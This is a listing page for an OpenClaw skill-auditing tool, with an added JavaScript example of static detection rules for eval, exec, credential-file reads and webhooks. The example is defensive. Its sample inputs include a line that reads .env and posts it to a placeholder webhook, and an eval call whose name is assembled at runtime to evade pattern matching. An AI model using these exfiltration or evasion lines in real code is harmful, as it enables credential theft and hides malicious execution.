Raini Skill Audit
Skill by 0xraini
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/0xraini/raini-skill-audit
What This Skill Does
The Raini Skill Audit is a critical security-focused tool for the OpenClaw ecosystem, designed to protect users from supply chain attacks and malicious code execution within third-party agents. As AI agents gain the capability to read local files and execute commands, the risk of downloading a compromised skill increases significantly. This audit tool acts as a static analysis engine that parses skill codebases to identify risky patterns, such as unauthorized access to credentials, sensitive data exfiltration to external webhooks, or the use of dangerous functions like eval() and exec(). By providing a detailed risk score and a breakdown of security findings, it empowers users to make informed decisions before enabling unknown skills.
Installation
To integrate this security layer into your OpenClaw environment, use the provided ClawHub command. Ensure you have Node.js installed in your runtime environment to support the audit CLI script.
clawhub install openclaw/skills/skills/0xraini/raini-skill-audit
Once installed, the agent will gain the capability to run security assessments on any local path or specific skill name retrieved from your library.
Use Cases
- Pre-Install Verification: Automatically scan any new skill from the community before it is initialized or granted permissions.
- Periodic Security Audits: Regularly scan your active skill workspace to ensure that dependencies have not been compromised through malicious updates.
- Development Workflow: Developers creating their own OpenClaw skills can use this audit tool to ensure their code meets standard security best practices before publishing to ClawHub.
- Enterprise Compliance: Ensure that any agent deployed within a production environment does not contain high-risk code patterns that violate data privacy policies.
Example Prompts
- "Scan all my currently installed skills to see if any have high-risk patterns."
- "Please audit the 'moltdash' skill and let me know if it tries to access my .env files."
- "Run a security audit on the local directory at ./projects/experimental-agent and give me a summary report."
Tips & Limitations
This tool performs static analysis, which is highly effective at catching blatant malicious patterns but may struggle with highly obfuscated, multi-stage, or runtime-generated malware. Always treat skills with high-risk findings with extreme caution. The tool is not a replacement for sandboxing; it is a diagnostic utility meant to supplement your existing security posture. Ensure the audit script itself is kept updated by pulling the latest changes from the openclaw/skills source repository to benefit from newly added detection rules and pattern matching updates.
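The kind of pattern matching described under What This Skill Does, and the blind spot noted in Tips & Limitations, as an added example that is not Raini Skill Audit's own code. The rule names, weights, scoring scheme and both sample sources are assumptions constructed for illustration.

```javascript
// Added example: rules, weights and samples are assumptions,
// not Raini Skill Audit's real rule set.
const RULES = [
  { id: "dynamic-eval", weight: 40, re: /\beval\s*\(|\bnew\s+Function\s*\(/ },
  { id: "command-exec", weight: 40, re: /\bexec(Sync)?\s*\(|\bspawn(Sync)?\s*\(/ },
  { id: "credential-read", weight: 30, re: /\.env\b|\.ssh\/|\.aws\/credentials/ },
  { id: "outbound-webhook", weight: 20, re: /https?:\/\/[^\s"'`]*webhook[^\s"'`]*/i },
];

// Scan one file's text line by line; return findings with 1-based line numbers.
function auditSource(file, text) {
  const findings = [];
  text.split(/\r?\n/).forEach((line, i) => {
    for (const rule of RULES) {
      if (rule.re.test(line)) findings.push({ file, line: i + 1, rule: rule.id });
    }
  });
  return findings;
}

// Score = sum of weights of the distinct rules hit, capped at 100.
function riskScore(findings) {
  const hit = new Set(findings.map((f) => f.rule));
  const total = RULES.filter((r) => hit.has(r.id)).reduce((s, r) => s + r.weight, 0);
  return Math.min(100, total);
}

// Constructed sample: reads .env and posts it to a placeholder webhook URL.
const BLATANT = [
  'const fs = require("fs");',
  'const secrets = fs.readFileSync(".env", "utf8");',
  'fetch("https://example.invalid/webhook/abc", { method: "POST", body: secrets });',
  'eval(process.argv[2]);',
].join("\n");

// Constructed sample: the same call, but its name is assembled at runtime,
// so no rule's literal pattern appears anywhere in the text.
const ASSEMBLED = [
  'const name = ["ev", "al"].join("");',
  'globalThis[name](process.argv[2]);',
].join("\n");

const blatantFindings = auditSource("blatant.js", BLATANT);
console.log(blatantFindings, riskScore(blatantFindings));
console.log(riskScore(auditSource("assembled.js", ASSEMBLED)));
```

The second sample scoring 0 is the runtime-generated case the limitation describes, which is why a clean audit result still calls for sandboxing.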
Metadata
Paste this into your clawhub.json to enable this plugin.
{
  "plugins": {
    "official-0xraini-raini-skill-audit": {
      "enabled": true,
      "auto_update": true
    }
  }
}
Tags(AI)
Flags: file-read, code-execution